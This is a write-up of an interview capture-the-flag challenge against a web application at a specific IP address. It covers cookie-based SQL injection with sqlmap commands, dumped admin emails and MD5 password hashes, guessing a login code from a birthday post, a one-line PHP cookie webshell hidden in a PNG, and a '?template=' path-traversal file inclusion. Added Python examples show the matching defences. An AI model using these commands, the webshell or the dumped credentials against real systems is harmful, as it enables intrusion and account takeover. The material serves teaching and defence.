A friend was given a practical challenge in an interview; the same challenge turned up on the public internet, so I record it here.
Open the question link as follows:
Click on the about page; it gives some hints.
It says that directory scanning is required. dirsearch is used for the scan and some files are discovered.
Access robots.txt to see if there is any sensitive information.
It hints at /1234, but accessing that path returns a 404.
This public copy of the site has a different robots.txt; from the robots.txt of the friend's interview target machine, the content is known to be Company_admin/login.php, which is the backend of this website.
The backend requires an email, a password and a four-digit authentication code. A quick brute-force attempt shows that the captcha on this page changes every time it is refreshed, so brute-forcing the form is not feasible.
The about.php page of the interview target machine also hints at sqli, i.e. SQL injection, so there is clearly a SQL injection vulnerability somewhere on the site.
Click on the blog on the homepage; there is an id parameter, so test it for SQL injection.
There is a hint here: "about my password".
Running sqlmap directly against the id parameter finds that it cannot retrieve any content.
Through testing, it is found that the injection point is in the cookie.
3 and 4.
Run directly with sqlmap.
sqlmap -u "http://47.114.90.165:21001/single.php" --cookie "id=6" --level 2 -v 3 -D hs_test_s1_blog --tables
There are five tables.
Read the table contents:
sqlmap -u "http://47.114.90.165:21001/single.php" --cookie "id=6" --level 2 -v 3 -D hs_test_s1_blog -T admin --columns
When sqlmap enumerates the columns of admin, it keeps reporting errors, so manual injection is used here.
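The injectable value here travels in the Cookie header, which is why probing only the GET parameter found nothing. The defensive point is that a cookie is as untrusted as any query string. The following is an added example (not code from the write-up or the target site) of how the single-post lookup should treat a cookie-supplied id: parse the header, require a plain integer, and bind it as a parameter. The in-memory SQLite table and its rows are constructed for the demonstration.

```python
import re
import sqlite3
from http.cookies import SimpleCookie


def build_sample_db():
    """Constructed in-memory stand-in for the blog's posts table (not the target's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT NOT NULL)")
    conn.executemany(
        "INSERT INTO posts VALUES (?, ?)",
        [(6, "Happy birthday to me"), (7, "Second post")],
    )
    return conn


def post_id_from_cookie(cookie_header):
    """Treat the Cookie header as untrusted input: parse it, then require a plain integer.

    Returns the integer id, or None when the cookie is absent or malformed.
    """
    jar = SimpleCookie()
    try:
        jar.load(cookie_header or "")
    except Exception:  # malformed cookie header
        return None
    if "id" not in jar:
        return None
    value = jar["id"].value
    # Positive integer of at most nine digits; anything else (quotes, spaces,
    # SQL keywords) is rejected before it gets near the database.
    if not re.fullmatch(r"[1-9][0-9]{0,8}", value):
        return None
    return int(value)


def single_post_title(conn, cookie_header):
    """Hardened equivalent of single.php's lookup: validated id, bound parameter."""
    post_id = post_id_from_cookie(cookie_header)
    if post_id is None:
        return None
    # The bound parameter can never change the statement's structure.
    row = conn.execute("SELECT title FROM posts WHERE id = ?", (post_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_sample_db()
    print(single_post_title(db, "session=abc; id=6"))
    print(single_post_title(db, "id=6'"))
```

Both layers matter: the regex rejects anything that is not a numeric id, and the bound parameter means that even a future regex mistake cannot turn the value into SQL.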
Obtain five accounts:
2020-08-08 20:16:55:fakeaddr@gmail.com:e69dc2c09e8da6259422d987ccbe95b5
2021-10-19 01:44:56:123@qq.com:fcea920f7412b5da7be0cf42b8c93759
2021-10-19 02:53:01:qwe@gmail.com:fcea920f7412b5da7be0cf42b8c93759
2021-10-19 23:41:40:qian@gmail.com:e10adc3949ba59abbe56e057f20f883e
The plaintext of [email protected] is asdqwe123.
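The dumped admin rows store each password as a bare 32-hex-character digest with no salt and no algorithm prefix, the shape of a raw MD5 hash, and two of the accounts share the same digest, so they share a password. Both properties are what make the plaintext recoverable by lookup. As an added example (not code from the write-up), the block below parses the dumped rows as they appear above, flags the unsalted fast-hash format and the shared digest, and shows the salted, memory-hard alternative (`hashlib.scrypt` from the standard library) under which two users with the same password get different stored values.

```python
import hashlib
import hmac
import os
import re
from collections import defaultdict

# The admin rows dumped in the write-up, in the same "time:email:hash" layout.
DUMPED_ROWS = """\
2020-08-08 20:16:55:fakeaddr@gmail.com:e69dc2c09e8da6259422d987ccbe95b5
2021-10-19 01:44:56:123@qq.com:fcea920f7412b5da7be0cf42b8c93759
2021-10-19 02:53:01:qwe@gmail.com:fcea920f7412b5da7be0cf42b8c93759
2021-10-19 23:41:40:qian@gmail.com:e10adc3949ba59abbe56e057f20f883e
"""

ROW_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}):([^:]+):([0-9a-fA-F]+)$")


def parse_rows(text):
    """Split the dump into dicts; lines that do not match the layout are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append({"created": m.group(1), "email": m.group(2), "hash": m.group(3).lower()})
    return rows


def audit_hashes(rows):
    """Report accounts using an unsalted fast hash and digests shared by several accounts."""
    findings = {"unsalted_fast_hash": [], "shared_hash": {}}
    by_hash = defaultdict(list)
    for r in rows:
        # 32 hex chars with no salt or algorithm prefix is the shape of a bare MD5 digest.
        if re.fullmatch(r"[0-9a-f]{32}", r["hash"]):
            findings["unsalted_fast_hash"].append(r["email"])
        by_hash[r["hash"]].append(r["email"])
    # Identical digests mean identical passwords: the scheme leaks password reuse directly.
    findings["shared_hash"] = {h: emails for h, emails in by_hash.items() if len(emails) > 1}
    return findings


def hash_password(password, salt=None):
    """Salted scrypt (n=2**14, r=8, p=1) in a self-describing storage format."""
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1, dklen=32)
    return f"scrypt$16384$8$1${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored parameters and compare in constant time."""
    _algo, n, r, p, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                            n=int(n), r=int(r), p=int(p), dklen=32)
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print(audit_hashes(parse_rows(DUMPED_ROWS)))
    stored = hash_password("example-passphrase")
    print(stored, verify_password("example-passphrase", stored))
```

Running the audit on the four rows reports all four as unsalted fast hashes and lists 123@qq.com and qwe@gmail.com under the shared digest; with the scrypt scheme the same password hashed twice yields two different stored strings, so reuse is no longer visible in a dump and each guess costs a memory-hard computation instead of a table lookup.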
Now only the four-digit authentication code remains. Since brute-forcing is not possible, go back to the hint on the about page, which mentions "some social engineering".
In the blog section of the interview target machine there are two articles; one of them is the author wishing himself a happy birthday, and it includes the birthday, 2019-10-27.
Try entering it: login succeeds with 1027.
The interface after logging in is as follows:
In the Blog - create post section there is an upload point; testing shows that it has a whitelist that only allows image-format extensions.
Check whether there is a file inclusion vulnerability: if so, a webshell embedded in an image can be included and commands executed.
In the access-language section there is a very familiar parameter, "?template=".
Direct file inclusion works, so prepare an image shell.
Create a PHP file and a PNG file.
cat 1.php >> 1.png
Testing shows that a webshell uploaded to this target machine cannot be reached through GET or POST parameters; it can only be controlled through a cookie parameter, just like the SQL injection, and then commands can be executed.
First, prepare the following webshell file.
<?php system($_COOKIE['a']);?>
Then make an image shell using the method above; the generated image is shown in the figure below.
Go back to the blog-creation page and upload the image shell.
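The upload filter only checks the file extension, and `cat 1.php >> 1.png` produces a file that is a valid PNG followed by extra bytes, so an extension whitelist cannot tell it from a real image. The following is an added example (not code from the write-up or the target) of the check an upload handler should make: walk the PNG chunk structure, verify each CRC, refuse script markers inside ancillary text chunks, and refuse any bytes after IEND. The 1x1 PNG used as sample input is constructed in the code.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype, body):
    """Encode one PNG chunk: length, type, data, CRC over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def make_minimal_png():
    """Constructed 1x1 8-bit greyscale PNG used as sample input (not an image from the write-up)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # width, height, bit depth, colour type, ...
    scanline = b"\x00\x00"                               # filter byte + one grey pixel
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(scanline)) + _chunk(b"IEND", b""))


def inspect_png(data):
    """Walk the chunk structure and return a list of problems (an empty list means clean)."""
    problems = []
    if not data.startswith(PNG_SIGNATURE):
        return ["not a PNG (bad signature)"]
    pos = len(PNG_SIGNATURE)
    seen_iend = False
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length  # 4 length + 4 type + body + 4 CRC
        if end > len(data):
            problems.append(f"truncated {ctype!r} chunk")
            break
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:end])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            problems.append(f"bad CRC in {ctype!r} chunk")
        # Ancillary chunks (lower-case first letter: tEXt, zTXt, ...) are free-form and a
        # common place to hide a script marker; critical chunks carry compressed pixel data.
        if ctype[:1].islower() and b"<?" in body:
            problems.append(f"script marker inside {ctype!r} chunk")
        pos = end
        if ctype == b"IEND":
            seen_iend = True
            break
    if not seen_iend:
        problems.append("missing IEND chunk")
    elif pos < len(data):
        # Exactly what appending a file to an image produces: data after the final chunk.
        problems.append(f"{len(data) - pos} trailing bytes after IEND")
    return problems


if __name__ == "__main__":
    clean = make_minimal_png()
    print(inspect_png(clean))
    print(inspect_png(clean + b"<?php echo 'x'; ?>"))
```

Structural checks like this catch the appended-file trick, but the robust fix is to re-encode every accepted image with an image library and store the result outside any directory the application will ever include from; an image that is never passed to include cannot become a webshell no matter what it contains.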
The address is upload/0c3459ff68c1495cefc557f0084a2ac6.png.
File inclusion: http://47.114.90.165:21001/Company_admin/language.php?template=../../upload/0c3459ff68c1495cefc557f0084a2ac6.png.
Capture this request with Burp, and then execute commands via the cookie.
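The `?template=` parameter is passed to an include with no restriction, so `../../upload/<file>.png` walks out of the template directory and executes whatever was uploaded. As an added example (not the target's code), the block below shows the two controls that close this: a template resolver that accepts only allowlisted names and then confirms the resolved real path still lies inside the template directory, and a small access-log check that surfaces traversal attempts against the parameter, including double-encoded ones. The template directory path and the language names are assumed for the example; the log lines are constructed, with the traversal request mirroring the one above.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed layout for the example; the write-up does not show the server's directory structure.
TEMPLATE_DIR = "/var/www/Company_admin/templates"
ALLOWED_TEMPLATES = {"en", "zh"}  # assumed language names


def resolve_template(template_param, base_dir=TEMPLATE_DIR, allowed=ALLOWED_TEMPLATES):
    """Map a user-supplied template name to a file path, or return None.

    Two independent layers: an allowlist of known names, and a realpath containment
    check so that even a mistake in the allowlist cannot escape base_dir.
    """
    name = (template_param or "").strip()
    if name not in allowed:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name + ".php"))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def traversal_attempts(log_lines, param="template"):
    """Return decoded values of `param` that look like path traversal or remote inclusion."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for value in parse_qs(query).get(param, []):
            decoded = unquote(value)  # parse_qs decoded once; this catches double-encoding
            if ".." in decoded or decoded.startswith("/") or "://" in decoded or "\x00" in decoded:
                hits.append(decoded)
    return hits


# Constructed access-log lines in combined format; the second mirrors the request in the write-up.
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Oct/2021:23:50:01 +0800] "GET /Company_admin/language.php?template=en HTTP/1.1" 200 512',
    '10.0.0.9 - - [19/Oct/2021:23:52:10 +0800] "GET /Company_admin/language.php?template=../../upload/0c3459ff68c1495cefc557f0084a2ac6.png HTTP/1.1" 200 88',
    '10.0.0.9 - - [19/Oct/2021:23:53:44 +0800] "GET /Company_admin/language.php?template=%252e%252e%2Fupload%2Fx.png HTTP/1.1" 200 88',
]


if __name__ == "__main__":
    print(resolve_template("en"))
    print(resolve_template("../../upload/0c3459ff68c1495cefc557f0084a2ac6.png"))
    for hit in traversal_attempts(SAMPLE_LOG):
        print("traversal attempt:", hit)
```

The allowlist alone would already reject the request used here; the realpath check is there for the day someone adds a "convenient" entry to the list, and the log check gives a detection signal for the attempts that precede a successful inclusion. A successful include also shows up as a 200 response for a `.png` path served through `language.php`, which is worth an alert on its own.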
Start looking for the flag.
Successfully found the flag.